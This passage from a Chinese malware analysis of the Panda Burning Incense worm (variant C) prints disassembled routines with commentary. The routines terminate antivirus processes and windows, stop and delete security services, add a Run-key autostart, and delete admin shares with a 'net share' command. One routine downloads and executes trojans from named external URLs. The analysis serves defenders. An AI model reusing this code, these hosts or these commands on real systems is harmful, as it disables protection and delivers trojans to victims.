lParamCODE:004068BDpush0wParamCODE:004068BFpush12hMsgCODE:004068C1pushebxhWndCODE:004068C2callPostMessageACODE:004068C7CODE:004068C7loc_4068C7:CODEXREF:Thread_Kill_av+5F1jThread_Kill_av+5F1jCODE:004068C7leaeax,[ebp+var_E4]CODE:004068CDmovedx,esi熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十二CODE:004068CFmovecx,65hCODE:004068D4call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004068D9movedx,[ebp+var_E4]CODE:004068DFmoveax,offsetaWinsockExpert"WinsockExpert"CODE:004068E4call@System@@LStrPos$qqrvCODE:004068E9testeax,eaxCODE:004068EBjzshortloc_4068F9CODE:004068EDpush0lParamCODE:004068EFpush0wParamCODE:004068F1push12hMsgCODE:004068F3pushebxhWndCODE:004068F4callPostMessageACODE:004068F9CODE:004068F9loc_4068F9:CODEXREF:Thread_Kill_av+623jThread_Kill_av+623jCODE:004068F9leaeax,[ebp+var_E8]CODE:004068FFmovedx,esiCODE:00406901movecx,65hCODE:00406906call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040690Bmovedx,[ebp+var_E8]CODE:00406911moveax,offsetaATJ"游戏木马检测大师"CODE:00406916call@System@@LStrPos$qqrvCODE:0040691Btesteax,eaxCODE:0040691Djzshortloc_40692BCODE:0040691Fpush0lParamCODE:00406921push0wParamCODE:00406923push12hMsgCODE:00406925pushebxhWndCODE:00406926callPostMessageACODE:0040692BCODE:0040692Bloc_40692B:CODEXREF:Thread_Kill_av+655jThread_Kill_av+655jCODE:0040692Bleaeax,[ebp+var_EC]CODE:00406931movedx,esiCODE:00406933movecx,65hCODE:00406938call@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:0040693Dmovedx,[ebp+var_EC]CODE:00406943moveax,offsetaMP"超级巡警"CODE:00406948call@System@@LStrPos$qqrvCODE:0040694Dtesteax,eaxCODE:0040694Fjzshortloc_40695D熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十三CODE:00406951push0lParamCODE:00406953push0wParamCODE:00406955push12hMsgCODE:00406957pushebxhWndCODE:00406958callPostMessageACODE:0040695DCODE:0040695Dloc_40695D:CODEXREF:Thread_Kill_av+687jThread_Kill_av+687jCODE:0040695Dtestebx,ebxCODE:0040695Fjnzloc_4062F9CODE:00406965callGetDesktopWindowCODE:0040696Amovedi,eaxCODE:0040696CCODE:0040696Cloc_40696C:CODEXREF:Thread_Kill_av+7C5jThread_Kill_av+7C5jCODE:0040696Cpush0LPCSTRCODE:0040696Epush0LPCSTRCODE:00406970pushebxHWNDCODE:00406971pushediHWNDCODE:00406972callFindWindowExACODE:00406977movebx,eaxCODE:00406979push0LPCSTRCODE:0040697BpushoffsetaMsctls_statusb"msctls_statusbar32"CODE:00406980push0HWNDCODE:00406982pushebxHWNDCODE:00406983callFindWindowExACODE:00406988push0LPCSTRCODE:0040698Apush0LPCSTRCODE:0040698Cpush0HWNDCODE:0040698EpusheaxHWNDCODE:0040698FcallFindWindowExACODE:00406994push65hnMaxCountCODE:00406996pushesilpStringCODE:00406997pusheaxhWndCODE:00406998callGetWindowTextACODE:0040699Dleaeax,[ebp+var_F0]CODE:004069A3movedx,esiCODE:004069A5movecx,65hCODE:004069AAcall@System@@LStrFromArray$qqrr17System@AnsiStringpciCODE:004069AFmovedx,[ebp+var_F0]CODE:004069B5moveax,offsetaPjfUstc"pjf(ustc)"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十四CODE:004069BAcall@System@@LStrPos$qqrvCODE:004069BFtesteax,eaxCODE:004069C1jzloc_406A8BCODE:004069C7push0lParamCODE:004069C9push0wParamCODE:004069CBpush12hMsgCODE:004069CDpushebxhWndCODE:004069CEcallPostMessageACODE:004069D3push0dwExtraInfoCODE:004069D5push0dwFlagsCODE:004069D7push0uMapTypeCODE:004069D9push11huCodeCODE:004069DBcallMapVirtualKeyACODE:004069E0pusheaxbScanCODE:004069E1push11hbVkCODE:004069E3callkeybd_eventCODE:004069E8push0dwExtraInfoCODE:004069EApush0dwFlagsCODE:004069ECpush0uMapTypeCODE:004069EEpush12huCodeCODE:004069F0callMapVirtualKeyACODE:004069F5pusheaxbScanCODE:004069F6push12hbVkCODE:004069F8callkeybd_eventCODE:004069FDpush0dwExtraInfoCODE:004069FFpush0dwFlagsCODE:00406A01push0uMapTypeCODE:00406A03push44huCodeCODE:00406A05callMapVirtualKeyACODE:00406A0ApusheaxbScanCODE:00406A0Bpush44hbVkCODE:00406A0Dcallkeybd_eventCODE:00406A12push0dwExtraInfoCODE:00406A14push2dwFlagsCODE:00406A16push0uMapTypeCODE:00406A18push44huCodeCODE:00406A1AcallMapVirtualKeyACODE:00406A1FpusheaxbScanCODE:00406A20push44hbVkCODE:00406A22callkeybd_eventCODE:00406A27push0dwExtraInfoCODE:00406A29push2dwFlags熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十五CODE:00406A2Bpush0uMapTypeCODE:00406A2Dpush11huCodeCODE:00406A2FcallMapVirtualKeyACODE:00406A34pusheaxbScanCODE:00406A35push11hbVkCODE:00406A37callkeybd_eventCODE:00406A3Cpush0dwExtraInfoCODE:00406A3Epush2dwFlagsCODE:00406A40push0uMapTypeCODE:00406A42push12huCodeCODE:00406A44callMapVirtualKeyACODE:00406A49pusheaxbScanCODE:00406A4Apush12hbVkCODE:00406A4Ccallkeybd_eventCODE:00406A51pushoffsetWindowName"IceSword"CODE:00406A56push0lpClassNameCODE:00406A58callFindWindowACODE:00406A5Dtesteax,eaxCODE:00406A5Fjzshortloc_406A8BCODE:00406A61push0dwExtraInfoCODE:00406A63push0dwFlagsCODE:00406A65push0uMapTypeCODE:00406A67push0DhuCodeCODE:00406A69callMapVirtualKeyACODE:00406A6EpusheaxbScanCODE:00406A6Fpush0DhbVkCODE:00406A71callkeybd_eventCODE:00406A76push0dwExtraInfoCODE:00406A78push2dwFlagsCODE:00406A7Apush0uMapTypeCODE:00406A7Cpush0DhuCodeCODE:00406A7EcallMapVirtualKeyACODE:00406A83pusheaxbScanCODE:00406A84push0DhbVkCODE:00406A86callkeybd_eventCODE:00406A8BCODE:00406A8Bloc_406A8B:CODEXREF:Thread_Kill_av+6F9jThread_Kill_av+6F9jCODE:00406A8BThread_Kill_av+797jThread_Kill_av+797jCODE:00406A8Btestebx,ebxCODE:00406A8Djnzloc_40696CCODE:00406A93moveax,offsetaMcshield_exe"Mcshield.
exe"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十六CODE:00406A98callKill_ProcessCODE:00406A9Dmoveax,offsetaVstskmgr_exe"VsTskMgr.
exe"CODE:00406AA2callKill_ProcessCODE:00406AA7moveax,offsetaNaprdmgr_exe"naPrdMgr.
exe"CODE:00406AACcallKill_ProcessCODE:00406AB1moveax,offsetaUpdaterui_exe"UpdaterUI.
exe"CODE:00406AB6callKill_ProcessCODE:00406ABBmoveax,offsetaTbmon_exe"TBMon.
exe"CODE:00406AC0callKill_ProcessCODE:00406AC5moveax,offsetaScan32_exe"scan32.
exe"CODE:00406ACAcallKill_ProcessCODE:00406ACFmoveax,offsetaRavmond_exe"Ravmond.
exe"CODE:00406AD4callKill_ProcessCODE:00406AD9moveax,offsetaCcenter_exe"CCenter.
exe"CODE:00406ADEcallKill_ProcessCODE:00406AE3moveax,offsetaRavtask_exe"RavTask.
exe"CODE:00406AE8callKill_ProcessCODE:00406AEDmoveax,offsetaRav_exe"Rav.
exe"CODE:00406AF2callKill_ProcessCODE:00406AF7moveax,offsetaRavmon_exe"Ravmon.
exe"CODE:00406AFCcallKill_ProcessCODE:00406B01moveax,offsetaRavmond_exe_0"RavmonD.
exe"CODE:00406B06callKill_ProcessCODE:00406B0Bmoveax,offsetaRavstub_exe"RavStub.
exe"CODE:00406B10callKill_ProcessCODE:00406B15moveax,offsetaKvxp_kxp"KVXP.
kxp"CODE:00406B1AcallKill_ProcessCODE:00406B1Fmoveax,offsetaKvmonxp_kxp"KvMonXP.
kxp"CODE:00406B24callKill_ProcessCODE:00406B29moveax,offsetaKvcenter_kxp"KVCenter.
kxp"CODE:00406B2EcallKill_ProcessCODE:00406B33moveax,offsetaKvsrvxp_exe"KVSrvXP.
exe"CODE:00406B38callKill_ProcessCODE:00406B3Dmoveax,offsetaKregex_exe"KRegEx.
exe"CODE:00406B42callKill_ProcessCODE:00406B47moveax,offsetaUihost_exe"UIHost.
exe"CODE:00406B4CcallKill_ProcessCODE:00406B51moveax,offsetaTrojdie_kxp"TrojDie.
kxp"CODE:00406B56callKill_ProcessCODE:00406B5Bmoveax,offsetaFrogagent_exe"FrogAgent.
exe"CODE:00406B60callKill_ProcessCODE:00406B65moveax,offsetaKvxp_kxp"KVXP.
kxp"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十七CODE:00406B6AcallKill_ProcessCODE:00406B6Fmoveax,offsetaKvmonxp_kxp"KvMonXP.
kxp"CODE:00406B74callKill_ProcessCODE:00406B79moveax,offsetaKvcenter_kxp"KVCenter.
kxp"CODE:00406B7EcallKill_ProcessCODE:00406B83moveax,offsetaKvsrvxp_exe"KVSrvXP.
exe"CODE:00406B88callKill_ProcessCODE:00406B8Dmoveax,offsetaKregex_exe"KRegEx.
exe"CODE:00406B92callKill_ProcessCODE:00406B97moveax,offsetaUihost_exe"UIHost.
exe"CODE:00406B9CcallKill_ProcessCODE:00406BA1moveax,offsetaTrojdie_kxp"TrojDie.
kxp"CODE:00406BA6callKill_ProcessCODE:00406BABmoveax,offsetaFrogagent_exe"FrogAgent.
exe"CODE:00406BB0callKill_ProcessCODE:00406BB5moveax,offsetaLogo1__exe"Logo1_.
exe"CODE:00406BBAcallKill_ProcessCODE:00406BBFmoveax,offsetaLogo_1_exe"Logo_1.
exe"CODE:00406BC4callKill_ProcessCODE:00406BC9moveax,offsetaRundl132_exe"Rundl132.
exe"CODE:00406BCEcallKill_ProcessCODE:00406BD3xoreax,eaxCODE:00406BD5popedxCODE:00406BD6popecxCODE:00406BD7popecxCODE:00406BD8movfs:[eax],edxCODE:00406BDBpushoffsetloc_406BF8CODE:00406BE0CODE:00406BE0loc_406BE0:CODEXREF:CODE:00406BF6jCODE:00406BF6jCODE:00406BE0leaeax,[ebp+var_F0]CODE:00406BE6movedx,22hCODE:00406BEBcall@System@@LStrArrayClr$qqrpviCODE:00406BF0retnCODE:00406BF0Thread_Kill_avendpsp=1ChCODE:00406BF0这部分主要是病毒写入注册表自启动项使病毒开机后会自动运行,写入项如下:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"svcshare"="%Sysdir%\drivers\spoclsv.
exe然后病毒修改以下注册表项使用户无法显示隐藏文件:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedFolder\Hidden\SHOWALL\CheckedValue熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十八.
病毒还做了以下清除反病毒软件操作:终止窗体名包含以下字符串的相应进程:QQKavQQAV天网防火墙进程VirusScan网镖杀毒毒霸瑞星江民黄山IE超级兔子优化大师木马克星木马清道夫木馬清道夫QQ病毒注册表编辑器系统配置实用程序卡巴斯基反病毒SymantecAntiVirusiDubaNOD32超级巡警esteemprocs绿鹰PC密码防盗噬菌体木马辅助查找器WrappedgiftKillerWinsockExpert游戏木马检测大师IceSword病毒通过枚举系统进程列表,终止以下相关进程:Mcshield.
exeVsTskMgr.
exenaPrdMgr.
exeUpdaterUI.
exe熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五十九TBMon.
exescan32.
exeRavmond.
exeCCenter.
exeRav.
exeRavmon.
exeRavStub.
exeKVXP.
kxpKvMonXP.
kxpKVCenter.
kxpKVSrvXP.
exeKRegEx.
exeUIHost.
exeTrojDie.
kxpFrogAgent.
exeLogo1_.
exeLogo_1.
exeRundl123.
exe接下来,看看病毒下载其它病毒部分:CODE:0040C478DWORD__stdcallDownload(LPVOID)CODE:0040C478DownloadprocnearDATAXREF:ThreadDownLoad+6oThreadDownLoad+6oCODE:0040C478CODE:0040C478var_3C=dwordptr3ChCODE:0040C478var_38=dwordptr38hCODE:0040C478var_34=dwordptr34hCODE:0040C478var_30=dwordptr30hCODE:0040C478var_2C=dwordptr2ChCODE:0040C478var_28=dwordptr28hCODE:0040C478var_24=dwordptr24hCODE:0040C478var_20=dwordptr20hCODE:0040C478var_1C=dwordptr1ChCODE:0040C478var_18=dwordptr18hCODE:0040C478var_14=dwordptr14hCODE:0040C478var_10=dwordptr10hCODE:0040C478var_C=dwordptr0ChCODE:0040C478var_8=dwordptr8CODE:0040C478var_4=dwordptr4CODE:0040C478CODE:0040C478pushebpCODE:0040C479movebp,esp熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十CODE:0040C47Bmovecx,7CODE:0040C480CODE:0040C480loc_40C480:CODEXREF:Download+DjDownload+DjCODE:0040C480push0CODE:0040C482push0CODE:0040C484dececxCODE:0040C485jnzshortloc_40C480CODE:0040C487pushecxCODE:0040C488pushebxCODE:0040C489pushesiCODE:0040C48ApushediCODE:0040C48Bxoreax,eaxCODE:0040C48DpushebpCODE:0040C48Epushoffsetj_@System@@HandleFinally$qqrv_34CODE:0040C493pushdwordptrfs:[eax]CODE:0040C496movfs:[eax],espCODE:0040C499xoreax,eaxCODE:0040C49BpushebpCODE:0040C49Cpushoffsetloc_40C688CODE:0040C4A1pushdwordptrfs:[eax]CODE:0040C4A4movfs:[eax],espCODE:0040C4A7leaedx,[ebp+var_C]CODE:0040C4AAmoveax,offsetaUup2__w"`uup2.
.
w"CODE:0040C4AFcallDecrypt_01http://www.
ctv163.
com/wuhan/down.
txtCODE:0040C4B4moveax,[ebp+var_C]CODE:0040C4B7call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C4BCleaedx,[ebp+var_8]CODE:0040C4BFcallOpenUrl打开上面的网页CODE:0040C4C4moveax,[ebp+var_8]CODE:0040C4C7movedx,offsetaQq"QQ"CODE:0040C4CCcall@System@@LStrCmp$qqrvCODE:0040C4D1jnzshortloc_40C4E0CODE:0040C4D3xoreax,eaxCODE:0040C4D5popedxCODE:0040C4D6popecxCODE:0040C4D7popecxCODE:0040C4D8movfs:[eax],edxCODE:0040C4DBjmploc_40C692CODE:0040C4E0CODE:0040C4E0CODE:0040C4E0loc_40C4E0:CODEXREF:熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十一Download+59jDownload+59jCODE:0040C4E0Download+1F8jDownload+1F8jCODE:0040C4E0movedx,[ebp+var_8]CODE:0040C4E3moveax,offsetasc_40C700"\r\n"CODE:0040C4E8call@System@@LStrPos$qqrvCODE:0040C4EDtesteax,eaxCODE:0040C4EFjleloc_40C5CECODE:0040C4F5leaeax,[ebp+var_4]CODE:0040C4F8pusheaxCODE:0040C4F9movedx,[ebp+var_8]CODE:0040C4FCmoveax,offsetasc_40C700"\r\n"CODE:0040C501call@System@@LStrPos$qqrvCODE:0040C506movecx,eaxCODE:0040C508dececxCODE:0040C509movedx,1CODE:0040C50Emoveax,[ebp+var_8]CODE:0040C511call@System@@LStrCopy$qqrvCODE:0040C516leaeax,[ebp+var_8]CODE:0040C519pusheaxCODE:0040C51Amovedx,[ebp+var_8]CODE:0040C51Dmoveax,offsetasc_40C700"\r\n"CODE:0040C522call@System@@LStrPos$qqrvCODE:0040C527addeax,2CODE:0040C52ApusheaxCODE:0040C52Bmoveax,[ebp+var_8]CODE:0040C52EcallunKnowCODE:0040C533movecx,eaxCODE:0040C535moveax,[ebp+var_8]CODE:0040C538popedxCODE:0040C539call@System@@LStrCopy$qqrvCODE:0040C53Epush0LPBINDSTATUSCALLBACKCODE:0040C540push0DWORDCODE:0040C542leaeax,[ebp+var_10]CODE:0040C545callsub_40C118CODE:0040C54Aleaeax,[ebp+var_10]CODE:0040C54DpusheaxCODE:0040C54Emoveax,[ebp+var_4]CODE:0040C551call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C556movebx,eaxCODE:0040C558movedx,ebxCODE:0040C55Aleaeax,[ebp+var_18]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十二CODE:0040C55Dcall@System@@LStrFromPChar$qqrr17System@AnsiStringpcCODE:0040C562moveax,[ebp+var_18]CODE:0040C565leaedx,[ebp+var_14]CODE:0040C568callTrimExprCODE:0040C56Dmovedx,[ebp+var_14]CODE:0040C570popeaxCODE:0040C571call@System@@LStrCat$qqrvCODE:0040C576moveax,[ebp+var_10]CODE:0040C579call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C57EpusheaxLPCSTRCODE:0040C57FpushebxLPCSTRCODE:0040C580push0LPUNKNOWNCODE:0040C582callURLDownloadToFileACODE:0040C587push0uCmdShowCODE:0040C589leaeax,[ebp+var_1C]CODE:0040C58Ccallsub_40C118CODE:0040C591leaeax,[ebp+var_1C]CODE:0040C594pusheaxCODE:0040C595moveax,[ebp+var_4]CODE:0040C598call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C59Dmovedx,eaxCODE:0040C59Fleaeax,[ebp+var_24]CODE:0040C5A2call@System@@LStrFromPChar$qqrr17System@AnsiStringpcCODE:0040C5A7moveax,[ebp+var_24]CODE:0040C5AAleaedx,[ebp+var_20]CODE:0040C5ADcallTrimExprCODE:0040C5B2movedx,[ebp+var_20]CODE:0040C5B5popeaxCODE:0040C5B6call@System@@LStrCat$qqrvCODE:0040C5BBmoveax,[ebp+var_1C]CODE:0040C5BEcall@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C5C3pusheaxlpCmdLineCODE:0040C5C4callWinExecCODE:0040C5C9jmploc_40C66CCODE:0040C5CECODE:0040C5CECODE:0040C5CEloc_40C5CE:CODEXREF:Download+77jDownload+77jCODE:0040C5CEleaeax,[ebp+var_4]CODE:0040C5D1movedx,[ebp+var_8]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十三CODE:0040C5D4call@System@@LStrLAsg$qqrpvpxvCODE:0040C5D9push0LPBINDSTATUSCALLBACKCODE:0040C5DBpush0DWORDCODE:0040C5DDleaeax,[ebp+var_28]CODE:0040C5E0callsub_40C118CODE:0040C5E5leaeax,[ebp+var_28]CODE:0040C5E8pusheaxCODE:0040C5E9moveax,[ebp+var_4]CODE:0040C5ECcall@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C5F1movebx,eaxCODE:0040C5F3movedx,ebxCODE:0040C5F5leaeax,[ebp+var_30]CODE:0040C5F8call@System@@LStrFromPChar$qqrr17System@AnsiStringpcCODE:0040C5FDmoveax,[ebp+var_30]CODE:0040C600leaedx,[ebp+var_2C]CODE:0040C603callTrimExprCODE:0040C608movedx,[ebp+var_2C]CODE:0040C60BpopeaxCODE:0040C60Ccall@System@@LStrCat$qqrvCODE:0040C611moveax,[ebp+var_28]CODE:0040C614call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C619pusheaxLPCSTRCODE:0040C61ApushebxLPCSTRCODE:0040C61Bpush0LPUNKNOWNCODE:0040C61DcallURLDownloadToFileACODE:0040C622push0uCmdShowCODE:0040C624leaeax,[ebp+var_34]CODE:0040C627callsub_40C118CODE:0040C62Cleaeax,[ebp+var_34]CODE:0040C62FpusheaxCODE:0040C630moveax,[ebp+var_4]CODE:0040C633call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C638movedx,eaxCODE:0040C63Aleaeax,[ebp+var_3C]CODE:0040C63Dcall@System@@LStrFromPChar$qqrr17System@AnsiStringpcCODE:0040C642moveax,[ebp+var_3C]CODE:0040C645leaedx,[ebp+var_38]CODE:0040C648callTrimExprCODE:0040C64Dmovedx,[ebp+var_38]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十四CODE:0040C650popeaxCODE:0040C651call@System@@LStrCat$qqrvCODE:0040C656moveax,[ebp+var_34]CODE:0040C659call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C65EpusheaxlpCmdLineCODE:0040C65FcallWinExecCODE:0040C664leaeax,[ebp+var_8]CODE:0040C667call@System@@LStrClr$qqrpvCODE:0040C66CCODE:0040C66Cloc_40C66C:CODEXREF:Download+151jDownload+151jCODE:0040C66Ccmp[ebp+var_8],0CODE:0040C670jnzloc_40C4E0CODE:0040C676leaeax,[ebp+var_4]CODE:0040C679call@System@@LStrClr$qqrpvCODE:0040C67Exoreax,eaxCODE:0040C680popedxCODE:0040C681popecxCODE:0040C682popecxCODE:0040C683movfs:[eax],edxCODE:0040C686jmpshortloc_40C692CODE:0040C688CODE:0040C688CODE:0040C688loc_40C688:DATAXREF:Download+24oDownload+24oCODE:0040C688jmp@System@@HandleAnyException$qqrvCODE:0040C68DCODE:0040C68Dcall@System@@DoneExcept$qqrvCODE:0040C692CODE:0040C692loc_40C692:CODEXREF:Download+63jDownload+63jCODE:0040C692Download+20EjDownload+20EjCODE:0040C692xoreax,eaxCODE:0040C694popedxCODE:0040C695popecxCODE:0040C696popecxCODE:0040C697movfs:[eax],edxCODE:0040C69Apushoffsetloc_40C6B4CODE:0040C69FCODE:0040C69Floc_40C69F:CODEXREF:j_@System@@HandleFinally$qqrv_34+5jj_@System@@HandleFinally$qqrv_34+5jCODE:0040C69Fleaeax,[ebp+var_3C]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十五CODE:0040C6A2movedx,0FhCODE:0040C6A7call@System@@LStrArrayClr$qqrpviCODE:0040C6ACretnCODE:0040C6ACDownloadendpsp=20hCODE:0040C6AC这里病毒通过网络连接http://www.
ctv163.
com/wuhan/down.
txt这个地址,然后解释出该地址中所下载的其它木马地址,然后下载并运行相应的木马程序,今天我试了下,病毒下载的木马地址为:http://www.
chinanet123.
cn/Class/about/image/images.
jpg/2007qq.
exe(感谢小崽娃帮忙下载此文件,下载后大概看了下是个QQ木马程序).
病毒运行后会关闭已中毒机器上的默认共享,当然你别以为他是做什么好事,只是为了避免病毒自已在局域内做重复工作而已.
关闭共享代码如下:CODE:0040C754SUBROUTINECODE:0040C754CODE:0040C754Attributes:bpbasedframeCODE:0040C754CODE:0040C754DWORD__stdcallThread_Del_Local_Share(LPVOID)CODE:0040C754Thread_Del_Local_ShareprocnearDATAXREF:Download_and_KillShare+19oDownload_and_KillShare+19oCODE:0040C754CODE:0040C754var_C=dwordptr0ChCODE:0040C754var_8=dwordptr8CODE:0040C754var_4=dwordptr4CODE:0040C754CODE:0040C754pushebpCODE:0040C755movebp,espCODE:0040C757push0CODE:0040C759push0CODE:0040C75Bpush0CODE:0040C75DpushebxCODE:0040C75Exoreax,eaxCODE:0040C760pushebpCODE:0040C761pushoffsetj_@System@@HandleFinally$qqrv_35CODE:0040C766pushdwordptrfs:[eax]CODE:0040C769movfs:[eax],espCODE:0040C76Cleaeax,[ebp+var_4]CODE:0040C76FcallGetValid_RootCODE:0040C774moveax,[ebp+var_4]CODE:0040C777callunKnowCODE:0040C77Cmovebx,eaxCODE:0040C77Ecmpebx,1CODE:0040C781jlshortloc_40C7C1熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十六CODE:0040C783CODE:0040C783loc_40C783:CODEXREF:Thread_Del_Local_Share+6BjThread_Del_Local_Share+6BjCODE:0040C783push0CODE:0040C785pushoffsetaCmd_exeCNetSha"cmd.
exe/cnetshare"CODE:0040C78Aleaeax,[ebp+var_C]CODE:0040C78Dmovedx,[ebp+var_4]CODE:0040C790movdl,[edx+ebx1]CODE:0040C794call@System@@LStrFromChar$qqrr17System@AnsiStringcCODE:0040C799push[ebp+var_C]CODE:0040C79Cpushoffsetdword_40C81CuCmdShowCODE:0040C7A1leaeax,[ebp+var_8]CODE:0040C7A4movedx,3CODE:0040C7A9call@System@@LStrCatN$qqrvCODE:0040C7AEmoveax,[ebp+var_8]CODE:0040C7B1call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:0040C7B6pusheaxlpCmdLineCODE:0040C7B7callWinExecCODE:0040C7BCdecebxCODE:0040C7BDtestebx,ebxCODE:0040C7BFjnzshortloc_40C783CODE:0040C7C1CODE:0040C7C1loc_40C7C1:CODEXREF:Thread_Del_Local_Share+2DjThread_Del_Local_Share+2DjCODE:0040C7C1push0uCmdShowCODE:0040C7C3pushoffsetCmdLine"cmd.
exe/cnetshareadmin$/del/y"CODE:0040C7C8callWinExecCODE:0040C7CDxoreax,eaxCODE:0040C7CFpopedxCODE:0040C7D0popecxCODE:0040C7D1popecxCODE:0040C7D2movfs:[eax],edxCODE:0040C7D5pushoffsetloc_40C7EFCODE:0040C7DACODE:0040C7DAloc_40C7DA:CODEXREF:CODE:0040C7EDjCODE:0040C7EDjCODE:0040C7DAleaeax,[ebp+var_C]CODE:0040C7DDmovedx,3CODE:0040C7E2call@System@@LStrArrayClr$qqrpviCODE:0040C7E7retnCODE:0040C7E7Thread_Del_Local_Shareendpsp=24h熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十七CODE:0040C7E7病毒关闭了以下默认共享:cmd.
exe/cnetshare驱动器名$/del/ycmd.
exe/cnetshareadmin$/del/y(这次少了A版本中的删除IPC$连接).
接下来进入最后的一个模块中,清除反病毒软件,代码如下:CODE:004070D4SUBROUTINECODE:004070D4CODE:004070D4CODE:004070D4DWORD__stdcallKill_Av_Services(LPVOID)CODE:004070D4Kill_Av_ServicesprocnearDATAXREF:Timer_kill_AV+6oTimer_kill_AV+6oCODE:004070D4moveax,offsetaSchedule"Schedule"CODE:004070D9callStop_ServiceCODE:004070DEmoveax,offsetaSharedaccess"sharedaccess"CODE:004070E3callStop_ServiceCODE:004070E8moveax,offsetaRsccenter"RsCCenter"CODE:004070EDcallStop_ServiceCODE:004070F2moveax,offsetaRsravmon"RsRavMon"CODE:004070F7callStop_ServiceCODE:004070FCmoveax,offsetaRsccenter_0"RsCCenter"CODE:00407101callDel_ServiceCODE:00407106moveax,offsetaRsravmon_0"RsRavMon"CODE:0040710BcallDel_ServiceCODE:00407110movedx,offsetaSoftwareMicr_1"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:00407115moveax,HKEY_LOCAL_MACHINECODE:0040711AcallRegDeleteCODE:0040711Fmoveax,offsetaKvwsc"KVWSC"CODE:00407124callStop_ServiceCODE:00407129moveax,offsetaKvsrvxp"KVSrvXP"CODE:0040712EcallStop_ServiceCODE:00407133moveax,offsetaKvwsc_0"KVWSC"CODE:00407138callDel_ServiceCODE:0040713Dmoveax,offsetaKvsrvxp_0"KVSrvXP"CODE:00407142callDel_ServiceCODE:00407147movedx,offsetaSoftwareMicr_2"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:0040714Cmoveax,HKEY_LOCAL_MACHINECODE:00407151callRegDeleteCODE:00407156moveax,offsetaKavsvc"kavsvc"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六十八CODE:0040715BcallStop_ServiceCODE:00407160moveax,offsetaAvp"AVP"CODE:00407165callStop_ServiceCODE:0040716Amoveax,offsetaAvp_0"AVP"CODE:0040716FcallDel_ServiceCODE:00407174moveax,offsetaKavsvc_0"kavsvc"CODE:00407179callDel_ServiceCODE:0040717Emovedx,offsetaSoftwareMicr_3"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:00407183moveax,HKEY_LOCAL_MACHINECODE:00407188callRegDeleteCODE:0040718Dmovedx,offsetaSoftwareMicr_4"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:00407192moveax,HKEY_LOCAL_MACHINECODE:00407197callRegDeleteCODE:0040719Cmoveax,offsetaMcafeeframewor"McAfeeFramework"CODE:004071A1callStop_ServiceCODE:004071A6moveax,offsetaMcshield"McShield"CODE:004071ABcallStop_ServiceCODE:004071B0moveax,offsetaMctaskmanager"McTaskManager"CODE:004071B5callStop_ServiceCODE:004071BAmoveax,offsetaMcafeeframew_0"McAfeeFramework"CODE:004071BFcallDel_ServiceCODE:004071C4moveax,offsetaMcshield_0"McShield"CODE:004071C9callDel_ServiceCODE:004071CEmoveax,offsetaMctaskmanage_0"McTaskManager"CODE:004071D3callDel_ServiceCODE:004071D8movedx,offsetaSoftwareMicr_5"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:004071DDmoveax,HKEY_LOCAL_MACHINECODE:004071E2callRegDeleteCODE:004071E7movedx,offsetaSoftwareMicr_6"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:004071ECmoveax,HKEY_LOCAL_MACHINECODE:004071F1callRegDeleteCODE:004071F6movedx,offsetaSoftwareMicr_7"SOFTWARE\\Microsoft\\Windows\\CurrentVersi".
.
.
CODE:004071FBmoveax,80000002hCODE:00407200callRegDeleteCODE:00407205moveax,offsetaNavapsvc"navapsvc"CODE:0040720AcallDel_ServiceCODE:0040720Fmoveax,offsetaWscsvc"wscsvc"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
